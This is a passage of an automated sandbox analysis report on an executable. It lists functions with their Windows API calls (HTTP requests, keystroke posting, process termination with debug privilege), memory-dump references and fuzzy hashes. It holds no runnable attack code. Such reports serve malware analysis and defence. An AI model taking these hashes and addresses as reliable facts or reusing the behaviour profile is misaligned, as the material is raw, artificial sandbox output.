                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F1E019
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F1E027
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00F1E03C
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00F1E044
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F1E0CF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                  • Opcode ID: f86487a528a8cc3b1883ec885484734dcafed6aa097898da26cb2cf8bccad920
                                                                                                                                  • Instruction ID: 2e0c146600141160da8d128b37c8ddfd04a2f2c57b818571ad34da30fa7a39ca
                                                                                                                                  • Opcode Fuzzy Hash: f86487a528a8cc3b1883ec885484734dcafed6aa097898da26cb2cf8bccad920
                                                                                                                                  • Instruction Fuzzy Hash: 3B71E131900209DFCF218F64CC80AEA7BB5FF49364F284269FD566A1A6C7718D81FB61
                                                                                                                                  Function 00EF4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF4C5E
                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EF4C8A
                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EF4CCC
                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EF4CE1
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EF4CEE
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EF4D1E
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00EF4D65
                                                                                                                                    • Part of subcall function 00EF56A9: GetLastError.KERNEL32(?,?,00EF4A2B,00000000,00000000,00000001), ref: 00EF56BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                                  • Opcode ID: 61bce9b2ca99c82a357267faff92f9d1771bcded8ad6ee897a33d0fe19eedbcc
                                                                                                                                  • Instruction ID: 1f7dc685b8e096e29ae47c9c81e5c2e960e3b356f41a340c70eabf77077fcf55
                                                                                                                                  • Opcode Fuzzy Hash: 61bce9b2ca99c82a357267faff92f9d1771bcded8ad6ee897a33d0fe19eedbcc
                                                                                                                                  • Instruction Fuzzy Hash: 3A419CB150120CBFEB129F60CC89FFB77ACEF08314F10912AFB01AA191E77599459BA0
                                                                                                                                  Function 00EFBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F3DBF0), ref: 00EFBBA1
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F3DBF0), ref: 00EFBBD5
                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EFBD33
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00EFBD5D
                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EFBEAD
                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,?), ref: 00EFBEF7
                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00EFBF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 793797124-0
                                                                                                                                  • Opcode ID: 3aa13507ebd2eb755481e36b629a7f360d9ab680a698fd7acc052711bb0da618
                                                                                                                                  • Instruction ID: ca53edd6923cc6c24e712ac4972d40a8233753248da17c6d4458300d6ee0ac5f
                                                                                                                                  • Opcode Fuzzy Hash: 3aa13507ebd2eb755481e36b629a7f360d9ab680a698fd7acc052711bb0da618
                                                                                                                                  • Instruction Fuzzy Hash: 45F1E675A00109EFCB14DFA4C884EBEB7B9FF89714F149499FA15AB250DB31AE42CB50
                                                                                                                                  Function 00EBB86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EA4954,00000000), ref: 00EA4A23
                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EBB85B), ref: 00EBB926
                                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EBB85B,00000000,?,?,00EBAF1E,?,?), ref: 00EBB9BD
                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00F1E775
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00F1E7EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2402799130-0
                                                                                                                                  • Opcode ID: b175a2d8f5fd8a7bc4fe0c50d51a160938b18669015a0e74a612f40d2ea3186f
                                                                                                                                  • Instruction ID: 283c049710460b0e27d04903fd3a463b855fc54908fab21383cb81d18cf6fcf4
                                                                                                                                  • Opcode Fuzzy Hash: b175a2d8f5fd8a7bc4fe0c50d51a160938b18669015a0e74a612f40d2ea3186f
                                                                                                                                  • Instruction Fuzzy Hash: 9161BD30500705CFDB359F25D888BAABBF5FF85325F181519E5A6975B0C7F0A891EB40
                                                                                                                                  Function 00F0B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F0B204
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  • Opcode ID: 730879d4cd8162c4e12a419578b5300c36f3d95c44897757af0dadd3cfb3c3b9
                                                                                                                                  • Instruction ID: 6f1f0ded0141e7ca2e345ce7da323da2e0ddd85fea16050b995c03e6ef219d2c
                                                                                                                                  • Opcode Fuzzy Hash: 730879d4cd8162c4e12a419578b5300c36f3d95c44897757af0dadd3cfb3c3b9
                                                                                                                                  • Instruction Fuzzy Hash: B7519031A00208BFEF319F28CC99F9E7BA5EB06724F204112F955E61E1C771E990BB90
                                                                                                                                  Function 00EBA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F1E9EA
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F1EA0B
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F1EA20
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F1EA3D
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F1EA64
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00F1EA6F
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F1EA8C
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00F1EA97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3992029641-0
                                                                                                                                  • Opcode ID: 6a725b887e95a093de45a953090d1c810604403291a6a59c95a38b01c07ffc9a
                                                                                                                                  • Instruction ID: f927f0714ff5f960e2a2fcb130bb577bae99f419a72bfaadd740114881b3c501
                                                                                                                                  • Opcode Fuzzy Hash: 6a725b887e95a093de45a953090d1c810604403291a6a59c95a38b01c07ffc9a
                                                                                                                                  • Instruction Fuzzy Hash: FC516C70A00209AFDB20DF64CC81FEA77F5BF08764F184528F956A7290D7B4ED81AB50
                                                                                                                                  Function 00EBF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00EBF737
                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00EBF77E
                                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00F1EB55
                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F1E9A0,00000004,00000000,00000000), ref: 00F1EBC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ShowWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                  • Opcode ID: 7cd4bda994c7ede738ad4ad93568d4ee91e762ce7868cdbb7aed2cde946fccff
                                                                                                                                  • Instruction ID: 2834e26f4747a309184b3ffe55df2b46ae7b3f4956d6f35fdcbd9ff69d1f3009
                                                                                                                                  • Opcode Fuzzy Hash: 7cd4bda994c7ede738ad4ad93568d4ee91e762ce7868cdbb7aed2cde946fccff
                                                                                                                                  • Instruction Fuzzy Hash: 4A415130638694DADB3587388CC8BFB7B95FB45316F2828AFE44762561CE74A880E711
                                                                                                                                  Function 00EDCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDE158
                                                                                                                                    • Part of subcall function 00EDE138: GetCurrentThreadId.KERNEL32 ref: 00EDE15F
                                                                                                                                    • Part of subcall function 00EDE138: AttachThreadInput.USER32(00000000,?,00EDCDFB,?,00000001), ref: 00EDE166
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EDCE06
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EDCE23
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EDCE26
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EDCE2F
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EDCE4D
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EDCE50
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EDCE59
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EDCE70
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EDCE73
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                  • Opcode ID: a8f1c4a613b50662ece85bb981201605ed696bb7fc3ac7602a351b3b555b4ad4
                                                                                                                                  • Instruction ID: c021cfd930a94d6810c43599a9e3c4d6e90b1e39e0869ba64fd82d41d2f9d303
                                                                                                                                  • Opcode Fuzzy Hash: a8f1c4a613b50662ece85bb981201605ed696bb7fc3ac7602a351b3b555b4ad4
                                                                                                                                  • Instruction Fuzzy Hash: FD11E5B195061CBEF7202B608C8EF6A3F6DDB08794F200416F2406B1E0CAF25C12AAA4
                                                                                                                                  Function 00EFC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EDA857: CLSIDFromProgID.COMBASE ref: 00EDA874
                                                                                                                                    • Part of subcall function 00EDA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00EDA88F
                                                                                                                                    • Part of subcall function 00EDA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00EDA89D
                                                                                                                                    • Part of subcall function 00EDA857: CoTaskMemFree.COMBASE(00000000), ref: 00EDA8AD
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00EFC6AD
                                                                                                                                  • _memset.LIBCMT ref: 00EFC6BA
                                                                                                                                  • _memset.LIBCMT ref: 00EFC7D8
                                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00EFC804
                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00EFC80F
                                                                                                                                  Strings
                                                                                                                                  • NULL Pointer assignment, xrefs: 00EFC85D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                  • Opcode ID: 6a1492f738a009058002e066d539c10c0e70fe7c02b80d98bb55d34aebe0ac35
                                                                                                                                  • Instruction ID: 4b178e104e0a59456438a5bab24f1e216d518e4de3c52366dd8e92227caf7a04
                                                                                                                                  • Opcode Fuzzy Hash: 6a1492f738a009058002e066d539c10c0e70fe7c02b80d98bb55d34aebe0ac35
                                                                                                                                  • Instruction Fuzzy Hash: F9913971D0021CABDB14DFA4DC81EEEBBB9AF09750F20516AF515B7281DB706A45CFA0
                                                                                                                                  Function 00F09882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F09926
                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F0993A
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F09954
                                                                                                                                  • _wcscat.LIBCMT ref: 00F099AF
                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F099C6
                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F099F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                  • String ID: SysListView32
                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                  • Opcode ID: 72fe7c2ba874613eeced74882167be2257f53fdaaa3b7bfec817a1a2667d2cd0
                                                                                                                                  • Instruction ID: c8dfbcca7840fc653748281a870e963be46a89389ff0dd1b0cdc77854c0dd55e
                                                                                                                                  • Opcode Fuzzy Hash: 72fe7c2ba874613eeced74882167be2257f53fdaaa3b7bfec817a1a2667d2cd0
                                                                                                                                  • Instruction Fuzzy Hash: C441C671A04308ABEF219F64CC85FEE77E8EF08350F10442AF545A72D2D2B59984AB50
                                                                                                                                  Function 00F01620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EE6F7D
                                                                                                                                    • Part of subcall function 00EE6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EE6F8D
                                                                                                                                    • Part of subcall function 00EE6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EE7022
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0168B
                                                                                                                                  • GetLastError.KERNEL32 ref: 00F0169E
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F016CA
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F01746
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00F01751
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F01786
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                  • Opcode ID: be7dcf1dd903417497fb6e5c8e97097ede824c818c3e7bf00e357dde47caef1f
